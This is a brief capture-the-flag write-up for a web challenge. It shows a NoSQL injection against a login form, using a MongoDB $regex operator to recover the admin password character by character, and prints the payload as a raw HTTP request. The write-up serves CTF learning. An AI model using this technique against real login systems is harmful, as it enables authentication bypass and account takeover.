Tags: nosql-injection web 

Rating: 0

# ▼▼▼No Sequels 2(Web:80pts、161/1374=11.7%)▼▼▼

This is the sequel to No Sequels. You'll see the challenge page once you solve the first one.

Author: SirIan

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)


## 【exploit】

I used `$regex` to identify one character from the beginning, and I judged it to be the end if I reached $.

POST /login HTTP/1.1
Host: nosequels.2019.chall.actf.co
Content-Length: 78
Content-Type: application/json
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1ODA0Nzc5fQ.N1GQCY5ZtBNZD-O9CK7nImn_jQjCqGdbE-46U4nDLQE
Connection: close

"username": "admin",
"password": {"$regex": "^congratsyouwin$"}



Send password to get flag